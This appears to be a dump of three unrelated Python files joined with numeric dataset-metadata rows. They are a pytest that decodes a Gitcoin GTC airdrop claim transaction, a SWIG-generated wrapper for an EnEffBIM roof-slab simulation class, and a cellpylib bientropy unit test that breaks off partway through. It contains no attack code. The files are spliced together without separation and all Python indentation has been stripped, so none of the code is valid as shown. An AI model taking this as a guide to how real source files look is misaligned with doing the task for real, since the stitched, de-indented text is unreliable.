@pytest.mark.parametrize('ethereum_accounts', [['0xdF5CEF8Dc0CEA8DC200F09280915d1CD7a016BDe']]) # noqa: E501
def test_gitcoin_claim(database, ethereum_manager, eth_transactions):
"""Data for claim taken from
https://etherscan.io/tx/0x0e22cbdbac56c785f186bec44d715ab0834ceeadd96573c030f2fae1550b64fa
"""
msg_aggregator = MessagesAggregator()
tx_hex = '0x0e22cbdbac56c785f186bec44d715ab0834ceeadd96573c030f2fae1550b64fa'
evmhash = deserialize_evm_tx_hash(tx_hex)
transaction = EthereumTransaction(
tx_hash=evmhash,
timestamp=1646375440,
block_number=14351442,
from_address='0xdF5CEF8Dc0CEA8DC200F09280915d1CD7a016BDe',
to_address='0xDE3e5a990bCE7fC60a6f017e7c4a95fc4939299E',
value=0,
gas=171249,
gas_price=22990000000,
gas_used=171249,
input_data=hexstring_to_bytes('0x09c5eabe000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000002e43f7658fd000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000001a0000000000000000000000000000000000000000000000000000000000000013500050000a7823d6f1e31569f51861e345b30c6bebf70ebe70000000000009cf6f6a78083ca3e2a662d6dd1703c939c8ace2e268d88ad09518695c6c3712ac10a214be5109a655671000927c00101006401867f7a4d000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc20000000000000000000000003f615ba21bc6cc5d4a6d798c5950cc5c42937fbd00000000000000000000000000000000000000000000000007392088b40d14000000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000004000000000000000000000000006c187e1b71ffbee4429003bb846c1b3eb1610000000000000000000000000000000000000000000000000000048c52ee05b140000000000000000000000000000000000000000000000000000000000000000000000000000000000000105041b1c1c1c73a08c7605fa9c69f068338cb7cd1c8dd21189cbe56f4cc66cff8dc7f0b0c8cc8c64433ea24643b893c9062beae6a05656b1df5643a242533d63925144c3e5c7dfd0509fb3c4232cfdb4c500e942a95b23439b3e18bab4a40057e1bdfae2d9967025b3f8fdca13354b25250c0d7fa9e4b472dc97df1f0cd0f595dc266d09e711628b3a63c1a6e4c83a11d3655891e31901eacf73b927e10bfbe6b0d5ed808cc228d606779a19a7dfb7393956b4fada14eaef8f6de6ee3824e67d6df18cc2d55f00cf869cc920135a94fb4abc213dc43e97812879d9efab046e4fffb931dcb55e5aa2b86f6a848408fea42cd221df99f1720b2ce22830498d78d04e1d083ba12800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'), # noqa: E501
nonce=12,
)
receipt = EthereumTxReceipt(
tx_hash=evmhash,
contract_address=None,
status=True,
type=0,
logs=[
EthereumTxReceiptLog(
log_index=473,
data=hexstring_to_bytes('0x00000000000000000000000000000000000000000000000eb9078f7826f80000'), # noqa: E501
address=string_to_ethereum_address('0xDe30da39c46104798bB5aA3fe8B9e0e1F348163F'),
removed=False,
topics=[
hexstring_to_bytes('0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef'), # noqa: E501
hexstring_to_bytes('0x000000000000000000000000de3e5a990bce7fc60a6f017e7c4a95fc4939299e'), # noqa: E501
hexstring_to_bytes('0x000000000000000000000000df5cef8dc0cea8dc200f09280915d1cd7a016bde'), # noqa: E501
],
), EthereumTxReceiptLog(
log_index=6,
data=hexstring_to_bytes('0x0000000000000000000000000000000000000000000000000000000000018580000000000000000000000000df5cef8dc0cea8dc200f09280915d1cd7a016bde00000000000000000000000000000000000000000000000eb9078f7826f80000bcfadbb867130fed43327b6c801903ab2afb5134ba5f3d47d2647ab858d5e49e'), # noqa: E501
address=string_to_ethereum_address('0xDE3e5a990bCE7fC60a6f017e7c4a95fc4939299E'),
removed=False,
topics=[
hexstring_to_bytes('0x04672052dcb6b5b19a9cc2ec1b8f447f1f5e47b5e24cfa5e4ffb640d63ca2be7'), # noqa: E501
],
),
],
)
dbethtx = DBEthTx(database)
dbethtx.add_ethereum_transactions([transaction], relevant_address=None)
decoder = EVMTransactionDecoder(
database=database,
ethereum_manager=ethereum_manager,
eth_transactions=eth_transactions,
msg_aggregator=msg_aggregator,
)
events = decoder.decode_transaction(transaction=transaction, tx_receipt=receipt)
assert len(events) == 2
expected_events = [
HistoryBaseEntry(
event_identifier='0x0e22cbdbac56c785f186bec44d715ab0834ceeadd96573c030f2fae1550b64fa',
sequence_index=0,
timestamp=1646375440000,
location=Location.BLOCKCHAIN,
event_type=HistoryEventType.SPEND,
event_subtype=HistoryEventSubType.FEE,
asset=A_ETH,
balance=Balance(
amount=FVal(0.00393701451),
usd_value=ZERO,
),
location_label='0xdF5CEF8Dc0CEA8DC200F09280915d1CD7a016BDe',
notes='Burned 0.00393701451 ETH in gas from 0xdF5CEF8Dc0CEA8DC200F09280915d1CD7a016BDe', # noqa: E501
counterparty=CPT_GAS,
), HistoryBaseEntry(
event_identifier='0x0e22cbdbac56c785f186bec44d715ab0834ceeadd96573c030f2fae1550b64fa',
sequence_index=474,
timestamp=1646375440000,
location=Location.BLOCKCHAIN,
event_type=HistoryEventType.RECEIVE,
event_subtype=HistoryEventSubType.AIRDROP,
asset=EthereumToken('0xDe30da39c46104798bB5aA3fe8B9e0e1F348163F'),
balance=Balance(amount=FVal('271.5872'), usd_value=ZERO),
location_label='0xdF5CEF8Dc0CEA8DC200F09280915d1CD7a016BDe',
notes='Claim 271.5872 GTC from the GTC airdrop',
counterparty='0xDE3e5a990bCE7fC60a6f017e7c4a95fc4939299E',
),
]
assert events == expected_events
| 63.721154 | 1,730 | 0.769177 | 1,067 | 19,881 | 14.102156 | 0.169634 | 0.018608 | 0.0319 | 0.015153 | 0.642188 | 0.617133 | 0.579119 | 0.540772 | 0.501163 | 0.492789 | 0 | 0.423565 | 0.179065 | 19,881 | 311 | 1,731 | 63.926045 | 0.498376 | 0.037071 | 0 | 0.684932 | 0 | 0 | 0.46646 | 0.450726 | 0 | 1 | 0.448419 | 0 | 0.020548 | 1 | 0.010274 | false | 0 | 0.054795 | 0 | 0.065068 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
47a88b04392b7ec9e4a8e356b9b82cf9fb219f95 | 15,969 | py | Python | SimModel_Python_API/simmodel_swig/Release/SimSlab_RoofSlab_RoofUnderAir.py | EnEff-BIM/EnEffBIM-Framework | 6328d39b498dc4065a60b5cc9370b8c2a9a1cddf | [
"MIT"
] | 3 | 2016-05-30T15:12:16.000Z | 2022-03-22T08:11:13.000Z | SimModel_Python_API/simmodel_swig/Release/SimSlab_RoofSlab_RoofUnderAir.py | EnEff-BIM/EnEffBIM-Framework | 6328d39b498dc4065a60b5cc9370b8c2a9a1cddf | [
"MIT"
] | 21 | 2016-06-13T11:33:45.000Z | 2017-05-23T09:46:52.000Z | SimModel_Python_API/simmodel_swig/Release/SimSlab_RoofSlab_RoofUnderAir.py | EnEff-BIM/EnEffBIM-Framework | 6328d39b498dc4065a60b5cc9370b8c2a9a1cddf | [
"MIT"
] | null | null | null | # This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.7
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_SimSlab_RoofSlab_RoofUnderAir', [dirname(__file__)])
except ImportError:
import _SimSlab_RoofSlab_RoofUnderAir
return _SimSlab_RoofSlab_RoofUnderAir
if fp is not None:
try:
_mod = imp.load_module('_SimSlab_RoofSlab_RoofUnderAir', fp, pathname, description)
finally:
fp.close()
return _mod
_SimSlab_RoofSlab_RoofUnderAir = swig_import_helper()
del swig_import_helper
else:
import _SimSlab_RoofSlab_RoofUnderAir
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr_nondynamic(self, class_type, name, static=1):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
if (not static):
return object.__getattr__(self, name)
else:
raise AttributeError(name)
def _swig_getattr(self, class_type, name):
return _swig_getattr_nondynamic(self, class_type, name, 0)
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object:
pass
_newclass = 0
try:
import weakref
weakref_proxy = weakref.proxy
except:
weakref_proxy = lambda x: x
import SimSlab_Default_Default
import base
class SimSlab_RoofSlab(SimSlab_Default_Default.SimSlab):
__swig_setmethods__ = {}
for _s in [SimSlab_Default_Default.SimSlab]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SimSlab_RoofSlab, name, value)
__swig_getmethods__ = {}
for _s in [SimSlab_Default_Default.SimSlab]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SimSlab_RoofSlab, name)
__repr__ = _swig_repr
def Name(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_Name(self, *args)
def Representation(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_Representation(self, *args)
def PredefinedSlabType(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_PredefinedSlabType(self, *args)
def ConstructionType(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_ConstructionType(self, *args)
def SlabIsExternal(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SlabIsExternal(self, *args)
def CompositeThermalTrans(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_CompositeThermalTrans(self, *args)
def PhotoVotaicArrayOnElement(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_PhotoVotaicArrayOnElement(self, *args)
def SlabThickness(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SlabThickness(self, *args)
def SlabPerimeter(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SlabPerimeter(self, *args)
def SlabGrossArea(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SlabGrossArea(self, *args)
def SlabNetArea(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SlabNetArea(self, *args)
def SlabGrossVolume(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SlabGrossVolume(self, *args)
def SlabNetVolume(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SlabNetVolume(self, *args)
def ClassRef_UniFormat(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_ClassRef_UniFormat(self, *args)
def MaterialLayerSet(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_MaterialLayerSet(self, *args)
def ConnectedSlabs(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_ConnectedSlabs(self, *args)
def ConnectedWalls(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_ConnectedWalls(self, *args)
def ConnectedBeams(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_ConnectedBeams(self, *args)
def ConnectedColumns(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_ConnectedColumns(self, *args)
def ContainingRamp(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_ContainingRamp(self, *args)
def ContainingStair(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_ContainingStair(self, *args)
def SimSlab_Name(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SimSlab_Name(self, *args)
def SimSlab_ConstructionName(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SimSlab_ConstructionName(self, *args)
def SimSlab_ZoneName(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SimSlab_ZoneName(self, *args)
def SimSlab_OutsdBndCond(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SimSlab_OutsdBndCond(self, *args)
def SimSlab_OutsdBndCondObject(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SimSlab_OutsdBndCondObject(self, *args)
def SimSlab_SunExposure(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SimSlab_SunExposure(self, *args)
def SimSlab_WindExposure(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SimSlab_WindExposure(self, *args)
def SimSlab_ViewFactToGnd(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SimSlab_ViewFactToGnd(self, *args)
def SimSlab_NumbVerts(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SimSlab_NumbVerts(self, *args)
def SurfProp_HeatTransAlg_MultSurf_Name(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SurfProp_HeatTransAlg_MultSurf_Name(self, *args)
def SurfProp_HeatTransAlg_MultSurf_SurfType(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SurfProp_HeatTransAlg_MultSurf_SurfType(self, *args)
def SurfProp_HeatTransAlg_MultSurf_Algorithm(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_SurfProp_HeatTransAlg_MultSurf_Algorithm(self, *args)
def __init__(self, *args):
this = _SimSlab_RoofSlab_RoofUnderAir.new_SimSlab_RoofSlab(*args)
try:
self.this.append(this)
except:
self.this = this
def _clone(self, f=0, c=None):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab__clone(self, f, c)
__swig_destroy__ = _SimSlab_RoofSlab_RoofUnderAir.delete_SimSlab_RoofSlab
__del__ = lambda self: None
SimSlab_RoofSlab_swigregister = _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_swigregister
SimSlab_RoofSlab_swigregister(SimSlab_RoofSlab)
class SimSlab_RoofSlab_RoofUnderAir(SimSlab_RoofSlab):
__swig_setmethods__ = {}
for _s in [SimSlab_RoofSlab]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SimSlab_RoofSlab_RoofUnderAir, name, value)
__swig_getmethods__ = {}
for _s in [SimSlab_RoofSlab]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SimSlab_RoofSlab_RoofUnderAir, name)
__repr__ = _swig_repr
def SimSlab_SurfType(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_SimSlab_SurfType(self, *args)
def SimSlab_Vertex_1_120_X_Coord(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_SimSlab_Vertex_1_120_X_Coord(self, *args)
def SimSlab_Vertex_1_120_Y_Coord(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_SimSlab_Vertex_1_120_Y_Coord(self, *args)
def SimSlab_Vertex_1_120_Z_Coord(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_SimSlab_Vertex_1_120_Z_Coord(self, *args)
def SimSlab_AzimuthAng(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_SimSlab_AzimuthAng(self, *args)
def SimSlab_TiltAng(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_SimSlab_TiltAng(self, *args)
def SimSlab_StartXCoord(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_SimSlab_StartXCoord(self, *args)
def SimSlab_StartYCoord(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_SimSlab_StartYCoord(self, *args)
def SimSlab_StartZCoord(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_SimSlab_StartZCoord(self, *args)
def SimSlab_Length(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_SimSlab_Length(self, *args)
def SimSlab_Width(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_SimSlab_Width(self, *args)
def T24CRRCAgedEmittance(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_T24CRRCAgedEmittance(self, *args)
def T24CRRCAgedReflectance(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_T24CRRCAgedReflectance(self, *args)
def T24CRRCAgedSRI(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_T24CRRCAgedSRI(self, *args)
def T24CRRCInitialEmittance(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_T24CRRCInitialEmittance(self, *args)
def T24CRRCInitialReflectance(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_T24CRRCInitialReflectance(self, *args)
def T24CRRCInitialSRI(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_T24CRRCInitialSRI(self, *args)
def T24CRRCProductID(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_T24CRRCProductID(self, *args)
def T24FieldAppliedCoating(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_T24FieldAppliedCoating(self, *args)
def T24ConstructStatus3(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_T24ConstructStatus3(self, *args)
def __init__(self, *args):
this = _SimSlab_RoofSlab_RoofUnderAir.new_SimSlab_RoofSlab_RoofUnderAir(*args)
try:
self.this.append(this)
except:
self.this = this
def _clone(self, f=0, c=None):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir__clone(self, f, c)
__swig_destroy__ = _SimSlab_RoofSlab_RoofUnderAir.delete_SimSlab_RoofSlab_RoofUnderAir
__del__ = lambda self: None
SimSlab_RoofSlab_RoofUnderAir_swigregister = _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_swigregister
SimSlab_RoofSlab_RoofUnderAir_swigregister(SimSlab_RoofSlab_RoofUnderAir)
class SimSlab_RoofSlab_RoofUnderAir_sequence(base.sequence_common):
__swig_setmethods__ = {}
for _s in [base.sequence_common]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SimSlab_RoofSlab_RoofUnderAir_sequence, name, value)
__swig_getmethods__ = {}
for _s in [base.sequence_common]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SimSlab_RoofSlab_RoofUnderAir_sequence, name)
__repr__ = _swig_repr
def __init__(self, *args):
this = _SimSlab_RoofSlab_RoofUnderAir.new_SimSlab_RoofSlab_RoofUnderAir_sequence(*args)
try:
self.this.append(this)
except:
self.this = this
def assign(self, n, x):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_assign(self, n, x)
def begin(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_begin(self, *args)
def end(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_end(self, *args)
def rbegin(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_rbegin(self, *args)
def rend(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_rend(self, *args)
def at(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_at(self, *args)
def front(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_front(self, *args)
def back(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_back(self, *args)
def push_back(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_push_back(self, *args)
def pop_back(self):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_pop_back(self)
def detach_back(self, pop=True):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_detach_back(self, pop)
def insert(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_insert(self, *args)
def erase(self, *args):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_erase(self, *args)
def detach(self, position, r, erase=True):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_detach(self, position, r, erase)
def swap(self, x):
return _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_swap(self, x)
__swig_destroy__ = _SimSlab_RoofSlab_RoofUnderAir.delete_SimSlab_RoofSlab_RoofUnderAir_sequence
__del__ = lambda self: None
SimSlab_RoofSlab_RoofUnderAir_sequence_swigregister = _SimSlab_RoofSlab_RoofUnderAir.SimSlab_RoofSlab_RoofUnderAir_sequence_swigregister
SimSlab_RoofSlab_RoofUnderAir_sequence_swigregister(SimSlab_RoofSlab_RoofUnderAir_sequence)
# This file is compatible with both classic and new-style classes.
| 41.913386 | 136 | 0.763792 | 1,763 | 15,969 | 6.396483 | 0.112876 | 0.246076 | 0.332801 | 0.256274 | 0.674293 | 0.651946 | 0.621974 | 0.58872 | 0.442671 | 0.293074 | 0 | 0.005823 | 0.161187 | 15,969 | 380 | 137 | 42.023684 | 0.836058 | 0.018411 | 0 | 0.234657 | 1 | 0 | 0.016342 | 0.00383 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285199 | false | 0.00722 | 0.043321 | 0.259928 | 0.711191 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
9a6b8b686edca877cca8d5658613bbb9cff21e47 | 42,879 | py | Python | tests/test_bien.py | swifmaneum/cellpylib | 4f7be652f2bb49b58ea482b2929617d813111f77 | [
"Apache-2.0"
] | 124 | 2018-03-24T16:36:45.000Z | 2022-03-22T08:47:46.000Z | tests/test_bien.py | swifmaneum/cellpylib | 4f7be652f2bb49b58ea482b2929617d813111f77 | [
"Apache-2.0"
] | 24 | 2019-03-04T23:15:56.000Z | 2021-12-28T18:43:05.000Z | tests/test_bien.py | swifmaneum/cellpylib | 4f7be652f2bb49b58ea482b2929617d813111f77 | [
"Apache-2.0"
] | 21 | 2019-01-29T13:53:48.000Z | 2021-11-16T04:31:58.000Z | import unittest
import cellpylib as cpl
class TestBiEntropy(unittest.TestCase):
def test_binary_derivative(self):
self.assertEqual(cpl.binary_derivative('01010101'), '1111111')
self.assertEqual(cpl.binary_derivative('1111111'), '000000')
self.assertEqual(cpl.binary_derivative('000000'), '00000')
self.assertEqual(cpl.binary_derivative('00000'), '0000')
self.assertEqual(cpl.binary_derivative('0000'), '000')
self.assertEqual(cpl.binary_derivative('000'), '00')
self.assertEqual(cpl.binary_derivative('00'), '0')
self.assertEqual(cpl.binary_derivative('0'), '')
self.assertEqual(cpl.binary_derivative('00010001'), '0011001')
self.assertEqual(cpl.binary_derivative('0011001'), '010101')
self.assertEqual(cpl.binary_derivative('010101'), '11111')
self.assertEqual(cpl.binary_derivative('11111'), '0000')
self.assertEqual(cpl.binary_derivative('00011111'), '0010000')
self.assertEqual(cpl.binary_derivative('0010000'), '011000')
self.assertEqual(cpl.binary_derivative('011000'), '10100')
self.assertEqual(cpl.binary_derivative('10100'), '1110')
self.assertEqual(cpl.binary_derivative('1110'), '001')
self.assertEqual(cpl.binary_derivative('001'), '01')
self.assertEqual(cpl.binary_derivative('01'), '1')
self.assertEqual(cpl.binary_derivative('1'), '')
def test_bien(self):
# 2-bit strings
self.assertEqual(cpl.bien('00'), 0.0)
self.assertEqual(cpl.bien('01'), 1.0)
self.assertEqual(cpl.bien('10'), 1.0)
self.assertEqual(cpl.bien('11'), 0.0)
# 4-bit strings, asserts equality to 7 decimal places
self.assertAlmostEqual(cpl.bien('0000'), 0.0)
self.assertAlmostEqual(cpl.bien('0001'), 0.9496956846525874)
self.assertAlmostEqual(cpl.bien('0010'), 0.9496956846525874)
self.assertAlmostEqual(cpl.bien('0011'), 0.40522738115842555)
self.assertAlmostEqual(cpl.bien('0100'), 0.9496956846525874)
self.assertAlmostEqual(cpl.bien('0101'), 0.14285714285714285)
self.assertAlmostEqual(cpl.bien('0110'), 0.40522738115842555)
self.assertAlmostEqual(cpl.bien('0111'), 0.9496956846525874)
self.assertAlmostEqual(cpl.bien('1000'), 0.9496956846525874)
self.assertAlmostEqual(cpl.bien('1001'), 0.40522738115842555)
self.assertAlmostEqual(cpl.bien('1010'), 0.14285714285714285)
self.assertAlmostEqual(cpl.bien('1011'), 0.9496956846525874)
self.assertAlmostEqual(cpl.bien('1100'), 0.40522738115842555)
self.assertAlmostEqual(cpl.bien('1101'), 0.9496956846525874)
self.assertAlmostEqual(cpl.bien('1110'), 0.9496956846525874)
self.assertAlmostEqual(cpl.bien('1111'), 0.0)
# 8-bit strings, asserts equality to 7 decimal places
self.assertAlmostEqual(cpl.bien('00000000'), 0.0)
self.assertAlmostEqual(cpl.bien('00000001'), 0.9170735521822547)
self.assertAlmostEqual(cpl.bien('00000010'), 0.9370347771941213)
self.assertAlmostEqual(cpl.bien('00000011'), 0.44747006666680555)
self.assertAlmostEqual(cpl.bien('00000100'), 0.9454843334903775)
self.assertAlmostEqual(cpl.bien('00000101'), 0.22952306172250708)
self.assertAlmostEqual(cpl.bien('00000110'), 0.454318194570354)
self.assertAlmostEqual(cpl.bien('00000111'), 0.9444447585278324)
self.assertAlmostEqual(cpl.bien('00001000'), 0.9297978768247205)
self.assertAlmostEqual(cpl.bien('00001001'), 0.4719276050543988)
self.assertAlmostEqual(cpl.bien('00001010'), 0.22952306172250708)
self.assertAlmostEqual(cpl.bien('00001011'), 0.9506424806924296)
self.assertAlmostEqual(cpl.bien('00001100'), 0.45174483501301504)
self.assertAlmostEqual(cpl.bien('00001101'), 0.9532158402497685)
self.assertAlmostEqual(cpl.bien('00001110'), 0.9512928864313808)
self.assertAlmostEqual(cpl.bien('00001111'), 0.10727664290566898)
self.assertAlmostEqual(cpl.bien('00010000'), 0.9297978768247205)
self.assertAlmostEqual(cpl.bien('00010001'), 0.053399483437225476)
self.assertAlmostEqual(cpl.bien('00010010'), 0.4562411483887417)
self.assertAlmostEqual(cpl.bien('00010011'), 0.9506424806924296)
self.assertAlmostEqual(cpl.bien('00010100'), 0.23797261801876332)
self.assertAlmostEqual(cpl.bien('00010101'), 0.9402699705777856)
self.assertAlmostEqual(cpl.bien('00010110'), 0.9532158402497685)
self.assertAlmostEqual(cpl.bien('00010111'), 0.45515378785140964)
self.assertAlmostEqual(cpl.bien('00011000'), 0.46743129167867215)
self.assertAlmostEqual(cpl.bien('00011001'), 0.9265064677305163)
self.assertAlmostEqual(cpl.bien('00011010'), 0.9532158402497685)
self.assertAlmostEqual(cpl.bien('00011011'), 0.23945861703877014)
self.assertAlmostEqual(cpl.bien('00011100'), 0.9487195268740418)
self.assertAlmostEqual(cpl.bien('00011101'), 0.45772714740874854)
self.assertAlmostEqual(cpl.bien('00011110'), 0.1141247708092174)
self.assertAlmostEqual(cpl.bien('00011111'), 0.9444447585278324)
self.assertAlmostEqual(cpl.bien('00100000'), 0.9454843334903775)
self.assertAlmostEqual(cpl.bien('00100001'), 0.4562411483887417)
self.assertAlmostEqual(cpl.bien('00100010'), 0.053399483437225476)
